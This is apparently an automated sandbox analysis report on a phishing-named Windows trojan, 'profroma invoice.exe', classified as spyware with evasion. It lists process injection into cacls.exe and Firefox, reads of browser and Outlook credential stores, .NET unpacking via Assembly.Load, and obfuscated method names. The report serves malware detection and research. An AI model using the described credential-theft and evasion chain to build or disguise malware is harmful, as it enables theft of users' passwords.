                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: String function: 017AF290 appears 105 times
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: String function: 01777E54 appears 111 times
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: String function: 0179EA12 appears 86 times
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: String function: 0171B970 appears 280 times
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: String function: 01765130 appears 58 times
                Source: profroma invoice.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: profroma invoice.exe, 00000000.00000002.2279995550.0000000003243000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs profroma invoice.exe
                Source: profroma invoice.exe, 00000000.00000002.2284292192.0000000007CB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs profroma invoice.exe
                Source: profroma invoice.exe, 00000000.00000002.2279575813.00000000014FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs profroma invoice.exe
                Source: profroma invoice.exe, 00000000.00000002.2283036196.0000000005D10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs profroma invoice.exe
                Source: profroma invoice.exe, 00000000.00000000.2052864446.0000000000ECE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCDku.exe4 vs profroma invoice.exe
                Source: profroma invoice.exe, 00000000.00000002.2280594548.0000000004209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs profroma invoice.exe
                Source: profroma invoice.exe, 00000004.00000002.2808373676.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs profroma invoice.exe
                Source: profroma invoice.exe, 00000004.00000002.2808373676.0000000001297000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs profroma invoice.exe
                Source: profroma invoice.exe, 00000004.00000002.2809137029.000000000181D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs profroma invoice.exe
                Source: profroma invoice.exeBinary or memory string: OriginalFilenameCDku.exe4 vs profroma invoice.exe
                Source: profroma invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: profroma invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, Eb4KLjXAfOHtg2I0k0.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, Eb4KLjXAfOHtg2I0k0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, nDjOWhGfh6WE4H8O43.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, nDjOWhGfh6WE4H8O43.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, nDjOWhGfh6WE4H8O43.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, Eb4KLjXAfOHtg2I0k0.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, Eb4KLjXAfOHtg2I0k0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, nDjOWhGfh6WE4H8O43.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, nDjOWhGfh6WE4H8O43.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, nDjOWhGfh6WE4H8O43.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/6
                Source: C:\Users\user\Desktop\profroma invoice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\profroma invoice.exe.logJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user\AppData\Local\Temp\t577G2K6Jump to behavior
                Source: profroma invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: profroma invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cacls.exe, 00000007.00000002.3924027497.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3924027497.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.3004503360.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.3001373375.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3924027497.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.3004503360.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: profroma invoice.exeVirustotal: Detection: 29%
                Source: profroma invoice.exeReversingLabs: Detection: 60%
                Source: unknownProcess created: C:\Users\user\Desktop\profroma invoice.exe "C:\Users\user\Desktop\profroma invoice.exe"
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess created: C:\Users\user\Desktop\profroma invoice.exe "C:\Users\user\Desktop\profroma invoice.exe"
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess created: C:\Users\user\Desktop\profroma invoice.exe "C:\Users\user\Desktop\profroma invoice.exe"Jump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\profroma invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: profroma invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: profroma invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: profroma invoice.exe, 00000004.00000002.2808373676.0000000001297000.00000004.00000020.00020000.00000000.sdmp, vEErKBMCpBGs.exe, 00000006.00000003.2743930343.0000000000935000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: profroma invoice.exe, 00000004.00000002.2808373676.0000000001297000.00000004.00000020.00020000.00000000.sdmp, vEErKBMCpBGs.exe, 00000006.00000003.2743930343.0000000000935000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vEErKBMCpBGs.exe, 00000006.00000002.3924116723.000000000060E000.00000002.00000001.01000000.0000000C.sdmp, vEErKBMCpBGs.exe, 00000008.00000002.3923999107.000000000060E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: profroma invoice.exe, 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2808880817.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2811423115.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: profroma invoice.exe, profroma invoice.exe, 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000007.00000003.2808880817.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2811423115.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, nDjOWhGfh6WE4H8O43.cs.Net Code: WjpyriWS9FFvAEHu9Kp System.Reflection.Assembly.Load(byte[])
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, nDjOWhGfh6WE4H8O43.cs.Net Code: WjpyriWS9FFvAEHu9Kp System.Reflection.Assembly.Load(byte[])
                Source: 0.2.profroma invoice.exe.5d10000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_05D438D1 push es; retf 0007h0_2_05D438D2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004148D4 push cs; iretd 4_2_004148D7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0042E1F3 push edi; ret 4_2_0042E1FC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_00419391 push cs; retf 4_2_00419392
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0040AD51 push ebx; retf 4_2_0040AD54
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_00411D86 push ds; retf 4_2_00411D9F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0040ADAF push ebx; retf 4_2_0040AD54
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004035B0 push eax; ret 4_2_004035B2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_00404E90 push eax; ret 4_2_00404EA9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_016F225F pushad ; ret 4_2_016F27F9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_016F27FA pushad ; ret 4_2_016F27F9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017209AD push ecx; mov dword ptr [esp], ecx4_2_017209B6
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_016F283D push eax; iretd 4_2_016F2858
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_02928880 push ebx; retf 6_2_02928825
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_02928822 push ebx; retf 6_2_02928825
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0292F857 push ds; retf 6_2_0292F870
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_02922961 push eax; ret 6_2_0292297A
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_02936E62 push cs; retf 6_2_02936E63
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_02924FA4 push 00000024h; iretd 6_2_02924FB0
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_02933F05 push FFFFFFECh; iretd 6_2_02933F1E
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0294BCC4 push edi; ret 6_2_0294BCCD
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0315225F pushad ; ret 7_2_031527F9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031527FA pushad ; ret 7_2_031527F9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031809AD push ecx; mov dword ptr [esp], ecx7_2_031809B6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0315283D push eax; iretd 7_2_03152858
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03151368 push eax; iretd 7_2_03151369
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0273E7D3 push ds; retf 7_2_0273E7EC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02748844 push FFFFFF8Ah; ret 7_2_02748859
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0275AC40 push edi; ret 7_2_0275AC49
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_027377FC push ebx; retf 7_2_027377A1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0273779E push ebx; retf 7_2_027377A1
                Source: profroma invoice.exeStatic PE information: section name: .text entropy: 7.72479752308074
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, L9k0Y8CgHkeJjCg3eV.csHigh entropy of concatenated method names: 'YouJWHLFoS', 'Sc7JKSo3cK', 'gkhJPSYNfh', 'BHEJ0aeZiA', 'NWkJEHcMdb', 'Vi6JGICbLS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, xQIZVIrf6sT7DxqM3I.csHigh entropy of concatenated method names: 'QQpVZygmS', 'QN74CXQGn', 'cvnAnib6Z', 'VJtj1wyLd', 'tuEIvaDcB', 'aiq3e2844', 'KgbNbC8MuSXuTecKMg', 'zwQCbadmZPfwlSelEe', 'MSTw0qlfi', 'C3LJsLdo9'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, Nr6ZI2z2MS966uGdTs.csHigh entropy of concatenated method names: 'owxJAs8p5q', 'I1CJXb5LXs', 'zbCJI3swH1', 'URVJnbOiBG', 'OHcJxqYkyL', 'V0sJqc5pPc', 'XY5JNaqAEC', 'lRMJ2fcmZW', 'VY3JOmRuVZ', 'ULVJYchBDw'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, rNyObfMmS0nIkxXusY.csHigh entropy of concatenated method names: 'HX10OlMM63', 'nfl0YSHKjl', 'ycD0VOj0Ln', 'FGP04rX0bb', 'qm70BcxN5T', 'hS00ANR8tZ', 'DMZ0j1JcSW', 'CTr0XqksW9', 'VB10Ig78xd', 'A2i03ot8lN'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, E69Zsv7pxWg5OSmhEhH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YIsyEQ1rIg', 'koVyJnxWib', 'vkAyasHD20', 'vm5yyoKAfn', 'PhlykrZid2', 'v8Yy17CFla', 'Syfy2EXjCs'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, FgYs106YRjqCKNvYCX.csHigh entropy of concatenated method names: 'ToString', 'f4WfiL1t1t', 'w4YfxdCDxF', 'AcxfsIgZkh', 'IxAfq4pTwf', 'Vv5fNyvNaH', 'u0wf5wso3l', 'Yh2fohu0qM', 'SKjfFWHqfF', 'GDDfM1MQlr'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, jvEMfV7rQWSl2v48DAa.csHigh entropy of concatenated method names: 'ToString', 'YxAaXmQMnJ', 'PljaIgBGbK', 'HFCa3pfHgv', 'aNqanUNEgs', 'cMHaxZysmi', 'v7vasefklK', 'TkfaqvH1wb', 'GjdWmGs1OhYBMn2fgxB', 'b6M93WsqFH1gIl9gXZV'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, YymjjgSxYJipegrgUk.csHigh entropy of concatenated method names: 'f1oEvTWaiS', 'VNyE8wbheD', 'x5REEPuuQK', 'f4iEau8k8J', 'nCwEk25HOe', 'CQHE2cb4G6', 'Dispose', 'pCvwUIxMKx', 'B7wwbefjh2', 'dERwWu5c1e'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, nDjOWhGfh6WE4H8O43.csHigh entropy of concatenated method names: 's4KTLBnPXh', 'EZgTUOsLxJ', 'WWHTba0hJy', 'xNUTWRAjAc', 'Jt4TKKAxkU', 'IgTTPVorlS', 'JIWT0mXmuw', 't4JTGIr9Nf', 'YYVTZQGeqi', 'aMBTgmHTpV'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, HXNWPLmEsnSGE9gOPp.csHigh entropy of concatenated method names: 'djb8gST1yI', 'IO38euZl8Y', 'ToString', 'B838UtXnSA', 'BZ88btLrOC', 'lXc8W7Lsbh', 'Kni8Kxhgs1', 'ptG8PgdfYE', 'Een809sYp1', 'kaF8GcOXBa'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, Eb4KLjXAfOHtg2I0k0.csHigh entropy of concatenated method names: 'hJxblWli0r', 'T5dbDpSQ5V', 'GG7b61t5di', 'DB4bmXW1fn', 'YiNbQJHJV7', 'KOYbHOkg7A', 'Vh8bSO6OI4', 'v1hbdckjGW', 'PIZbhECVou', 'hIYbCPVWYP'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, QGouHtlnoTJGfnggnS.csHigh entropy of concatenated method names: 'pw8vu7nhox', 'BSevcrrFdX', 'o6fvl9vBiY', 'xgovDOrSSD', 'WpVvxOYOiP', 'kHIvsaCWoP', 'gfBvqtm7dy', 'jGGvNKeAnP', 'sU0v5pMrP2', 'BclvomDf9L'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, Y1J62X3yWJcvRi4nvO.csHigh entropy of concatenated method names: 'dhlKBVFepG', 'loYKj8If9K', 'pJDWsZvxMe', 'DivWqQ92DW', 'K1lWNnii1a', 'QkvW5N9Hg3', 'dTmWo9g4m3', 'koQWFi0nkZ', 'KMGWMkkQU6', 'jAeWuF0JsY'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, WgXcR5tZCEPlalIhRN.csHigh entropy of concatenated method names: 'CZNRX9BL5W', 'siHRI9ySw2', 'vyvRnRn7qO', 'rDgRxY41Uu', 'vDwRqo45Ec', 'wqIRNu0X4E', 'JajRo8ggCk', 'WZJRF9But5', 'SpxRuNyRn0', 'zVPRigq19y'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, eqwVjZhjtGw95m3lNk.csHigh entropy of concatenated method names: 'D53En4lv1D', 'hZfExstyRd', 't5CEsNpk3p', 'yFeEqlA8nf', 'hkiENUEGbM', 'O14E59PS9c', 'nWiEo6RQ9H', 'maPEFW3CxI', 'jPtEM96qrt', 'JnHEugBGZ3'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, S6ESZ8nXd0khtHVDWT.csHigh entropy of concatenated method names: 'mAvPLk9RpH', 'E4uPboelVT', 'CJDPKygXHq', 'vbGP0MGPf5', 'elvPG33G1U', 'YMgKQSrQs5', 'zDVKHIFpKj', 'SaVKSfHYQ9', 's8oKd6rxCL', 'FhcKh1mkIF'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, rcMTIsbMF7EyDhd8bP.csHigh entropy of concatenated method names: 'Dispose', 'sip7hegrgU', 'd2rrxqIJmM', 'Cw6sQl5TRs', 'uAY7CxtbDh', 'MYn7zBGCIg', 'ProcessDialogKey', 'KdLr9qwVjZ', 'DtGr7w95m3', 'QNkrro9k0Y'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, ycy97jIpv4GxRii10R.csHigh entropy of concatenated method names: 'd2KW4TFWiG', 'npEWAXw7e0', 'QUmWXZaBrV', 'TNgWIfbsbq', 'DQWWv2RHw4', 'baEWfJjS30', 'ES6W8PWuTm', 'ywkWwx17vY', 'dTmWEqPfhW', 'TUWWJaAjr5'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, Eu11kY77jLWEAJL7Za6.csHigh entropy of concatenated method names: 'leRJCMr9yo', 'I4xJzsUolI', 'yRsa9Ga2yu', 'i3Xa7tn1Wo', 'x6earKREvb', 'x0naTuXOUR', 'd4napF7ELc', 'MMraLBrWOC', 'QgJaUBevu6', 'BtMabUYl1V'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, PwM3qZ79O8r4sVfKe3v.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eZOJiyid2c', 'V4LJcEXbOl', 'J8MJttRvLE', 'bsfJlNJBPa', 'XJuJDsbsia', 'kdpJ6hVUvP', 'oIQJmglS7u'
